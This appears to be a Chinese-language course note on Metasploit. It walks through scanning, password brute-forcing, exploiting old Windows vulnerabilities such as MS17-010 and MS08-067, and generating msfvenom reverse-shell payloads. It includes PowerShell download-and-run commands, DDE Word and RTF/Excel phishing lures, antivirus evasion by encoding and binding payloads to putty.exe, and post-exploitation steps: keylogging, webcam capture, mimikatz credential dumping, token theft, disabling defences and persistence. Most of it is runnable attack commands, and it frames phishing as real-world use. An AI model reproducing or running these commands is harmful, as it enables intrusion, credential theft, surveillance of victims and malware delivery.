DAY11+12-MSF

  前言

  参考网站:渗透测试之Metasploit - FreeBuf网络安全行业门户

  一.MSF 信息收集模块

  1.专业术语

  渗透攻击(exploit)

  测试者利用系统程序,或服务的漏洞进行攻击的一个过程。

  攻击载荷(payload)

  攻击者在目标系统上执行的一段攻击代码,该代码具有返弹连接创建用户执行其他系统命令的功能

  shellcode

  在目标机器上运行的一段机器指令,成功执行后会返回一个shell

  模块(module)

  是指Metasploit框架中所使用的一段软件代码组件

  监听器(listener)

  监听器是metasploit中用来等待介入网络连接的组件。

  2.启动msf命令控制接口

  使用命令:

  msfconsole

图片.png

  3.查看所有参数和解释

  使用命令:

  help

图片.png

  4.启动设置

  启动服务

  service postgresql start

  service metasploit start

命令过时了

  启动msf命令控制接口

  msfconsole

  查看数据库连接状态

  db_status

  创一个工作台

  workspace  -a test

  删除 -d  选项

  进入工作台

  wordspace test

  扫描主机

  db_nmap -sS 192.168.80.1

  导出扫描结果

  db_export 1.xml

  db_import 1.xml

  查看扫描结果

  hosts

  5.信息搜集

  1.whois查询

  msf> whois example.com

  msf> whois  192.168.1.100

  2.在线收集服务器 IP信息工具

  http://searchdns.netcraft.com/

  3.nslookup

  查询DNS的记录

  查看域名解析是否正常

  在网络故障的时候用来诊断网络问题

  4.nmap查询

  msf> db_nmap  –sS  –A  192.168.1.111

  msf> db_services  

查看扫描结果

  6.高级扫描方式

  实操示例

图片.png

  use  auxiliary/scanner/ip/ipidseq      

 IPID序列扫描器,与 nmap的-sI -O选项类似

  show  options

  set RHOSTS 192.168.1.0/24

  set RPORT  8080

  set THREADS 50

  run

  7.端口扫描---portscan模块

  实操示例

图片.png

   search  portscan

   use  auxiliary/scanner/portscan/syn

  set  rhosts  192.168.80.136

  set  threads   50

  run

  8.特定扫描---smb_version 模块

  实操示例

图片.png

   use  auxiliary/scanner/smb/smb_version

  showoptions

  set RHOSTS192.168.80.136

  run

  db_hosts –caddress,os_flavor

  9.找MSSQL主机

  实操示例

图片.png

  use  auxiliary/scanner/mssql/mssql_ping

  show  options

  set rhosts  192.168.80.0/24

  set threads 255

  run

  10.SSH 服务器扫描

  实操示例

图片.png


  use  auxiliary/scanner/ssh/ssh_version

  set  rhosts  192.168.80.0/24

  set  threads 255

  run

  11.Telnet服务器扫描

  实操示例

图片.png

  use  auxiliary/scanner/telnet/telnet_version

  set rhosts  192.168.80.0/24

  set threads 255

  run

  12.FTP主机扫描

  实操示例

图片.png

  use auxiliary/scanner/ftp/ftp_version

  show options

  set rhosts  192.168.80.0/24

  set  threads 255

  run

  13.描 FTP 匿名登录

  实操示例

图片.png

  use auxiliary/scanner/ftp/anonymous

  set  rhosts  192.168.80.0/24

  set  threads  255

  run

  14.扫描局域网内存活主机

  实操示例

图片.png

  use  auxiliary/scanner/discovery/arp_sweep

  set rhosts 192.168.80.0/24

  set  threads 255

  run

  15.扫描网站目录

  实操示例

图片.png

  use  auxiliary/scanner/http/dir_scanner

  set  rhosts  192.168.80.136

  set  threads  50

  run

  16.搜索网站中的E-mail地址

  实操示例

图片.png

  use  auxiliary/gather/search_email_collector

  set domain  cracer.com

  run

  17.嗅探抓包

  示例实操

图片.png图片.png

  use  auxiliary/sniffer/psnuffle

  run

  二.MSF 密码破解模块

  1.ssh服务口令猜测

  use   auxiliary/scanner/ssh/ssh_login

  set rhosts   192.168.80.134

  set USERNAME root

  set PASS_FILE/root/pass.txt

  set threads 50

  run

  2.mysql口令攻击

  search mysql

  use  auxiliary/scanner/mysql/mysql_login

  show options

  set rhosts  192.168.80.130

  set user_file/root/user.txt

  exploit

  3.postgresql攻击

  search  postgresql

  use  auxiliary/scanner/postgres/postgres_login

  show options

  set rhosts  192.168.80.130

  set user_file/root/user.txt

  exploit

  4.tomcat 攻击

  search tomcat

  use  auxiliary/scanner/http/tomcat_mgr_login

  set RHOSTS  192.168.1.1

  set PASS_FILE/root/pass.txt

  set USER_FILE/root/user.txt

  exploit

  5.telnet 攻击

  useauxiliary/scanner/telnet/telnet_login

  set  rhosts  192.168.1.1

  exploit

  6.samba攻击

  use  auxiliary/scanner/smb/smb_login

  set RHOSTS  192.168.1.1 /192.168.1.0/24

  set THREADS 200

  exploit

  三.MSF 漏洞利用模块

  1.Metasploit 常用漏洞利用命令

  用指定关键字搜索可利用漏洞

  search <name>

  使用漏洞

  use <exploit name>

  显示选项

  show options

  设置选项

  set <OPTION NAME> <option>

  显示装置

  show payloads

   显示目标(os版本)

  show targets

   设置目标版本

  set TARGET<target number>

  开始漏洞攻击

  exploit

  列出会话

  sessions -l

  选择会话

  sessions -i <ID>

  结束会话

  sessions -k  <ID>

  把会话放到后台

  <ctrl> z

  结束会话

  <ctrl> c

  显示辅助模块

  show auxiliary

   使用辅助模块

  use <auxiliaryname>

  设置选项

  set <OPTIONNAME> <option>

  运行模块

  run

  2.MS10_002

IE浏览器漏洞

  use  windows/browser/ms10_002_aurora

  set payload  windows/meterpreter/reverse_tcp

  show options

  set SRVPORT 80

  set URIPATH /

  set LHOST  192.168.2.128

  set LPORT 444

  exploit

  3.MS10_018

IE浏览器漏洞--IE6和IE7

  受影响的操作系统

  Microsoft Internet Explorer 7.0

  Microsoft Internet Explorer 6.0 SP1

  Microsoft Internet Explorer 6.0

  参考网站:渗透测试(MS10-018漏洞利用)CSDN博客

  1.使用Nmap进行扫描,查看目标主机是否含有我们想要利用的漏洞

  全部扫描:

  nmap -P0 --script=smb-vuln-conficker 【IP】

  nmap -P0 --script=smb-vuln-* 【IP】

  具体扫描:

  smb-vuln-ms10-018

  2.进入MSF,查看MS10-018漏洞是否可用

  进入MSF

  msfconsole

  查找漏洞

  search ms10_018

  3.利用漏洞进行监听

  use exploit/windows/browser/ms10_018_ie_behaviors

  set payload windows/meterpreter/reverse_tcp

  set SRVPORT 80

  set URIPATH /

  set LHOST 192.168.42.131

XP的IP

  set LPORT 880

  exploit

  4.MS12-020

远程桌面协议RDP远程代码执行漏洞

  参考网站:攻防实验二:ms12-020(死亡蓝屏)漏洞复现-CSDN博客

  影响操作系统

  windows xp

  Windows Server 2003

  Windows Server 2008

  Windows 7

  1.切换管理员账户

  sudo su

  2.端口扫描

  nmap 192.168.1.128

查看是否开放3389端口

  3.进入武器库

  msfconsole

  4.加载 ms12-020 攻击模块

  search ms12-020

  use [option]

  set  rhosts 192.168.1.128

  5.攻击

  run

  5.MS10-046

显示特制的快捷方式图标,则该漏洞可能允许远程执行代码

  受影响的操作系统

  Microsoft Windows XP SP3

  Microsoft Windows XP SP2

  Microsoft Windows Vista SP2

  Microsoft Windows Vista SP1

  Microsoft Windows Server 2008 R2

  Microsoft Windows Server 2003 SP2

  Microsoft Windows 7

  参考网站:漏洞复现---MS10-046漏洞_Hskb的博客-CSDN博客

  1.确保能够ping通

  ping  192.168.254.255

  2.进入MSF攻击框架

  msfconsole

  3.搜索MS10-046漏洞

  search ms10_046

  4.引用编号为【0】的漏洞

  use 0

  5.查看漏洞可配置的内容

  show options

  6.配置命令

  set  srvhost  KALI的IP地址

  set payload windows/meterpreter/reverse_tcp

配置攻击载荷

  set lhost KALI的IP地址

  7.配置完成,运行

  run

  8.将生成的[URL地址]到目标机的[浏览器]进行打开

  http://192.168.254.255

图片.png

  9.点击快捷方式

  pALBrUuiu

图片.png

  10.成功获得一台机器的控制权

  sessions 1

图片.png

  6.MS08_067

Windows Server服务RPC请求缓冲区溢出漏洞

  参考网站:ms08-067漏洞复现_ms08-067复现-CSDN博客

  1.进入武器库

  msfconsole

  2.搜索ms08-067相关的攻击模块

  search  ms08-067

  3.使用攻击模块

  use  0

  4.查看适合哪些版本

  show targets


  5.设置目标主机的类型设置

  set  target  [34]

  6.查看需要配置的参数

  show options

  7.设置目标主机的IP

  set  rhosts  192.168.254.133

  8.查看可以用的payload

  show  payloads

  9.设置攻击载荷

  set pyaload windows/meterpreter/reverse_tcp

  10.配置监听地址

  set  lhost  192.168.254.255

Kali的ip地址

  11.开始渗透

  run /exploit

  7.MS12-004

打开特制的媒体文件,这些漏洞可能允许远程执行代码

  search ms12-004

  show options

  use  exploit/windows/browser/ms12_004_midi

  set PAYLOAD  windows/meterpreter/reverse_tcp

  set LHOST  192.168.2.128

  show targets

  exploit

  8.MS17-010

永恒之蓝---无需解释

  参考网站:永恒之蓝漏洞复现(ms17-010)-CSDN博客

  基础命令

  实操示例



  进入msf:

  msfconsole

  使用ms17-010扫描模块

  use  auxiliary/scanner/smb/smb_ms17_010

  设置目标IP或网段

  set RHOSTS   192.168.254.133

  执行扫描

  run

  使用search查找相关漏洞

  search  ms17_010

  使用模块

   use exploit/windows/smb/ms17_010_eternalblue

  查看可设置的选项

  show options

  设置***目标ip

  set RHOSTS 192.168.254.133

  执行攻击

  exploit / run

  后渗透命令

  实操示例

  查看当前用户

  getuid

  进入shell

  shell

  解决shell乱码

  chcp 65001

  退出shell

  exit

  把会话放到后台

  background

  查看所有会话

  sessions

  进入某个会话

  sessions -i id号

  删除会话

  sessions -k id号

  通过Shell对靶机Win7进行控制

  创建用户名密码 blue/blue

  net user blue blue /add

  将用户blue添加入管理组

  net localgroup administrators blue /add

  开启远程桌面功能

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

  Kali远程桌面连接Win7

  rdesktop 172.16.70.199:3389

  9.Linux samba

远程代码执行漏洞

  远程代码执行条件

  1. 服务器打开了文件/打印机共享端口445,让其能够在公网上访问

  2. 共享文件拥有写入权限

  3. 恶意攻击者需猜解Samba服务端共享目录的物理路径

  具体命令

  search samba

  use  linux/samba/lsa_transnames_heap

  show payloads

  set payloadlinux/x86/shell_bind_tcp

  set LPORT 8080

  set RHOST  192.168.2.66

  exploit

  四.MSF 各种PAYLOAD

  1.msfvenom

  1.简介

  msfpayload和msfencode的结合体

  2.所有参数

  参数详解

  3.常用参数

  查看攻击载荷支持什么平台,哪些选项

  msfvenom -p windows/meterpreter/reverse_tcp --list-options

  查看所有payloads

  msfvenom --list payloads

  查看所有编码器

  msfvenom --list encoders

  x86/shikata_ga_nai是免杀中使用频率最高的一个编码器

  其他查看设置

  参考网站:MSF攻击载荷的生成 - 换头怪 - 博客园 (cnblogs.com)

  msfvenom --list  命令

  nops              在payload上添加指定长度的nop指令

  platforms    指定payload的目标操作系统平台

  archs             指定payload的目标CPU架构

  encrypt         解密方式

  formats         指定输出格式

  2.监听参数

防止假session

  接收到seesion后继续监听端口,保持侦听

  set ExitOnSession false

防止session意外退出

  默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0

  set SessionCommunicationTimeout  0

  默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0,可永久不会被关闭

  set SessionExpirationTimeout 0

  3.handler后台持续监听

  快捷的建立监听的方式

  handler -H 192.168.8.124 -P 1122 -p windows/x64/meterpreter/reverse_tcp

  -H    目标机IP

  -P     目标机端口

  -p     攻击载荷

  后台持续监听

  exploit -j -z

  -j   为后台任务

  -z  为持续监听

   查看和管理后台任务

  jobs

  结束所有任务

  jobs -K

  4.payload的可持续化

  原理

  一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭

  在后期想做持久化的时候只能再使用migrate进行。

  命令

  msfvenom -p  windows/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122  -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o  shell.exe

生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。

  参数解释

  PrependMigrate=true PrependMigrateProc=svchost.exe

  使这个程序默认会迁移到svchost.exe进程

  自己测试的时候不建议到这个进程而是其他的持久进程

  -p     指定使用的攻击载荷模块

  -e     指定使用x86/shikata_ga_nai编码器,

  -f      选项告诉MSF编码器输出格式为exe,

  -o     选项指定输出的文件名为shell.exe,保存在根目录下。

  5.各平台payload生成

  1.Linux

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<YourPort to Connect On> -f elf > shell.elf

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -a x86 --platform Linux -f elf > shell.elf

  2.Windows

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<YourPort to Connect On> -f exe > shell.exe

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f exe >shell.exe

  3.Mac

  msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f macho > shell.macho

  4.Android

  msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 -f raw >shell.apk

  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.8.124 LPORT=1122 R > test.apk

  6.生成脚本payload

  1.Powershell

  msfvenom -a x86 --platform  Windows   -p  windows/powershell_reverse_tcp    LHOST=192.168.8.124 LPORT=1122                       -e  cmd/powershell_base64 -i 3 -f raw -o shell.ps1

  2.Netcat

  nc正向连接

  msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.8.124  LPORT=1122  -f exe> 1.exe

  nc反向连接

  msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.124  LPORT=1122  -f exe> 1.exe

  3.PHP

  msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IPAddress> LPORT=<Your Port to Connect On> -f raw > shell.php

  cat shell.php |pbcopy && echo '<?php ' | tr -d '\n' > shell.php &&pbpaste >> shell.php

  4.ASP

  msfvenom -p  windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<YourPort to Connect On> -f asp > shell.asp

  5.JSP

  msfvenom -p  java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f raw > shell.jsp

  6.WAR

  msfvenom -p  java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port toConnect On> -f war > shell.war

  7.侦听Handlers

  use exploit/multi/handler

  set PAYLOAD <Payload name>

  set LHOST 192.168.8.124

  set LPORT 1122

  set ExitOnSession false

  exploit -j -z

  五.攻击与免杀

  1.Powershell 配合msf无文件攻击

  实战示例






  kali运行

  生成ps脚本

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.254.139  LPORT=1121 -f psh-reflection >x.ps1

  进入武器库

  msfconsole

  设置侦听

  use exploit/multi/handler

  设置攻击载荷

  set  payload windows/x64/meterpreter/reverse_tcp

  设置LHOST和LPORT

  set lhost 192.168.254.139

  set  lport   1121

  开始侦听

  run

  客户端运行

  powershell IEX(New-Object Net.WebClient).DownloadString('http://192.168.137.1/x.ps1')

  http://192.168.137.1/x.ps1     为x.ps1文件存在的位置

  2.Powershell配合word伪装木马执行

  实战示例






  新建word设置域

  DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.254.255/x.ps1') "

  目标机打开word, 就会建立连接。

  前提是对方有word    -_-

  没有被杀掉,能够执行

  3.msf使用宏钓鱼

  1.下载镜像 文件

  git clone https://github.com/bhdresh/CVE-2017-8759.git

  使用梯子秒下

  2.生成一个rtf后缀的文件

  python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.211.1/logo.txt

  python3无法运行

  3.生成一个exe后缀的执行文件

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.211.1 LPORT=1133 -f exe > /root/shell.exe

  4.将rft文件和exe文件捆绑

  python cve-2017-8759_toolkit.py -M exp -e http://192.168.211.1/shell.exe -l shell.exe

  5.设置监听

  msfconsole

  handler -H 192.168.211.1  -P 1133  -p windows/x64/meterpreter/reverse_tcp

  6.钓鱼模式

  将rtf文件放入靶机打开即可(实战即发送邮件给别人)

  4.msf制作excel钓鱼

  实战示例

  msfconsole

  show options

  use exploit/multi/script/web_delivery

  set payload windows/x64/meterpreter/reverse_tcp

  set LHOST 192.168.254.139

  set lport  1122

  show targets

  set target 2

  exploit

  5.制作钓鱼

  使用Out-Excel.ps1制作excel钓鱼文件:

  PS D:\temp> . .\Out-Excel.ps1

  PS D:\\temp> Out-Excel -PayloadURL http://192.168.0.199:8080/-OutputFile  D:\\test.xls

  制作chm钓鱼文件

  Out-CHM -PayloadURL http://192.168.3.143:8080/ -HHCPath"C:\\Program Files (x86)\\HTML Help Workshop"

  制作快捷方式钓鱼文件

  PS D:\temp> . .\Out-Shortcut.ps1

  PS D:\\temp> Out-Shortcut -PayloadURL http://192.168.3.143:8080/ -HotKey 'F3' -Icon'notepad.exe'

  nishang插件

  6.使用ngrock穿透内网

  网址:Sunny-Ngrok国内内网映射服务器

  1.开通一个免费的隧道

图片.png

  2.连接隧道

  ./sunny clientid   隧道id号

图片.png

  3.ping一下域名:域名有时候解析不到,直接用IP

  pingfree.idcfengye.com

图片.png

  4.配置exe执行命令文件

  msfvenom -p windows/x64/meterpreter/reverse_tcp  lhost=142.171.158.200 lport=10388 -f exe > 123.exe

  5.设置侦听

  msfconsole

  handler  -H  127.0.0.1  -P  10651 -p  -p windows/x64/meterpreter/reverse_tcp

  6.钓鱼模式

  将执行文件放到靶机上面去

  7.成功钓鱼

  建立会话连接

  鱼钓多了

  靶机连接隧道,然后隧道连接kali

  7.Evasion模块免杀

  现在用处不大了,基本上已经废掉了

  查看模块

  show  evasion

  使用use windows/windows_defender_exe进行生成payload

  msfconsole

  use windows/windows_defender_exe

  set filenamepayload.exe

  set payloadwindows/meterpreter/reverse_tcp

  set LHOST192.168.8.124

  set LPORT 1122

  run

  设置侦听

  handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp

  8.捆绑免杀

  生成payload 捆绑putty.exe

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124  LPORT=1122  -x putty.exe  -f exe -o payload3.exe

  捆绑编码免杀

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.124  LPORT=1122 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe

  多重编码免杀

  msfvenom -a x86 --platform windows -pwindows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14  LHOST=192.168.8.124 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai-b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -ecmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe

  验证静态免杀 bypass

  http://virustotal.com/

  9.shellter免杀

  shellcode代码注入工具

  https://www.shellterproject.com/download/

  10.免杀msfpayload

  生产py文件的payload

  msfVENOM -p windows/x64/meterpreter/reverse_tcp LPORT=10003 LHOST=119.28.66.234  -e x86/shikata_ga_nai -i 17 -f py -o  /root/121.py

  建立侦听

  handler -H 119.28.66.234 -P 10003 -p windows/meterpreter/reverse_tcp

  将生成的py文件修改处理

  六.MSF 后渗透模块

  1.Meterpreter介绍

  参考网站:Meterpreter命令详解 - 渗透测试中心 - 博客园 (cnblogs.com)

  是Metasploit框架中的一个扩展模块

  作为溢出成功以后的攻击载荷使用

  使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接

  2.基本命令

  进程迁移

  run post/windows/manage/migrate

  关闭杀软

  run killav

  通过其 shell 来关闭防火墙

  netsh adcfirewall set allprofiles state off

  查看目标机所有流量

  run packetrecorder-i 1

  提取系统信息

  run scraper

  查看进程

  ps

  切换进程

  migrate 1774

  截屏

  screenshot

  获取系统运行的平台

  sysinfo

  查看桌面

  run vnc

  开启目标主机远程桌面

  run  getgui  -e

  命令为显示远程主机的系统信息

  sysinfo

  3.文件系统命令

  查看文件内容,文件必须存在

  cat c:\boot.ini

  删除指定的文件

  del c:\boot.ini

  上传文件到目标机主上

  upload  setup.exe  C:\windows\system32\

  upload /root/Desktop/netcat.exe c:\

  下载文件到本机上

  download nimeia.txt  /root/Desktop/

  download C:\boot.ini  /root/

  编辑文件

  edit c:\boot.ini

  打印工作目录

  getwd

  更改本地目录

  cd

  列出在当前目录中的文件列表

  ls

  输出工作目录

  pwd

  进入目录文件下

  cd c:\

  删除文件

  rm file

  在受害者系统上的创建目录

  mkdir dier

  受害者系统上删除目录

  rmdir

  列出目标主机的文件和文件夹信息

  dir

  修改目标主机上的文件名

  mv

  search文件

  search  -d d:\www -f web.config

  search  -d c:\  -f  *.doc

  搜索文件

  search -f autoexec.bat

  search -f sea*.bat c:\xamp\

  用户登录数

  enumdesktops

  4.运行程序命令

  使用格式

  execute -f <file> [Options]

  执行cmd.exe命令并进行交互

  execute -f cmd.exe

  执行file参数所指定的文件

  execute  -H -m -d notepad.exe -f  wce.exe  -a  "-o wce.txt"

  常用参数

  -f       执行的程序文件

  -h     显示帮助信息

  -H     隐藏后台执行

  -i       跟进程进行交互

  -a      传递给命令的参数

  -m    从内存中执行

  -t       使用当前伪造的线程令牌运行进程

  -s       在给定会话中执行进程

  -d      在目标主机执行时显示的进程名称(用以伪装)

  -o       wce.txt是wce.exe的运行参数

  5.摄像头命令

  音频录制

  record_mic

  查看摄像头接口

  webcam_chat

  查看摄像头列表

  webcam_list

  摄像头视频获取

  webcam_stream

  6.端口转发命令

  portfwd -h

  使用格式

  portfwd [-h] [add | delete | list | flush]  [args]

  端口转发,本机监听4444,把目标机3389转到本机4444

  portfwd  add -l 4444 -p 3389 -r 192.168.1.102

  使用rdesktop来连接桌面

  rdesktop -u Administrator  -p bk#123  127.0.0.1:4444

  -u     用户名

  -p     密码

  需要输入用户名和密码远程连接

  rdesktop 127.1.1.0:4444

  选项:

      -L <opt>      要监听的本地主机(可选)

      -h                   帮助横幅

      -l <opt>       要监听的本地端口

      -p <opt>      连接到的远程端口

      -r <opt>      要连接到的远程主机

  7.shell网络环境命令

  meterpreter>run get_local_subnets

  添加一条通向目标服务器内网的路由

  meterpreter>run autoroute -s 100.0.0.0/8 #(根据目标内网网络而定)

  查看路由设置:

  meterpreter>run autoroute –p

  一般来说,在meterpreter中设置路由便可以达到通往其内网的目的。然而有些时候还是会失败

  这时我们可以background返回msf>,查看下外面的路由情况

  route print

  如果发现没有路由信息,说明meterpreter shell设置的路由并没有生效,我们可以在msf中添加路由。

  msf>route add 10.0.0.0 255.0.0.0 1

  说明:1表示session 1,攻击机如果要去访问100.0.0.0/8网段的资源,其下一跳是session1

  至于什么是下一条这里不多说了,反正就是目前攻击机可以访问内网资源了。

  8.键盘记录命令

  开启键盘记录功能

  keyscan_start

  显示捕捉到的键盘记录信息

  keyscan_dump

  停止键盘记录

  keyscan_stop

  在远程目标主机上添加一个用户

  add_user username password -h ip

  将用户添加到目标主机的域管理员组中

  add_group_user "Domain Admins" username -h ip

  9.Hash获取命令

  加载mimikatz

  load mimikatz

  获取hash值

  msv

  获取明文

  kerberos

  获取明文信息

  ssp

  获取系统账户信息

  wdigest

  必须要以错误的模块来让正确的模块显示

  mimikatz_command -f a::

  获取目标 hash

  mimikatz_command -f hash::

  mimikatz_command -f samdump::hashes

  mimikatz_command -f sekurlsa::searchPa

  run post/windows/gather/smart_hashdump

  10.抓包嗅探命令

  1.加载嗅探模块

  use sniffer

  2.列出目标主机所有开放的网络接口

  sniffer_interfaces

  3.获取正在实施嗅探网络接口的统计数据

  sniffer_start 2

  4.在目标主机上针对特定范围的数据包缓冲区启动嗅探

  sniffer_dump  2  /tmp/test2.cap

  5.停止嗅探

  sniffer_stop  2

  6.对抓取的包进行解包:

  use auxiliary/sniffer/psnuffle

  set  pcapfile  1.cap

  run

  wireshark加载这个 /tmp/xpsp 1.cap 也可

  11.盗取令牌命令

  加载incoginto功能

  用来盗窃目标主机的令牌或是假冒用户

  meterpreter> use incognito

  列出目标主机用户的可用令牌

  meterpreter> list_tokens -u

  列出目标主机用户组的可用令牌

  meterpreter> list_tokens -g

  假冒目标主机上的可用令牌

  meterpreter> impersonate_token QLWEB\\Administrato

  meterpreter> impersonate_token DOMAIN_NAME\\USERNAME

  12.持久控制服务器

  前提条件:服务器系统可以安装后门

  run metsvc

  命令

  msfconsole

  use  exploit/multi/handler

  set  payload  windows/metsvc_bind_tcp

  set  LPORT 31337

  set  RHOST  192.168.2.131

  run

  其他方法

  注册表

  服务后门

  计划任务

  cs

  rookit


分享:

支付宝

微信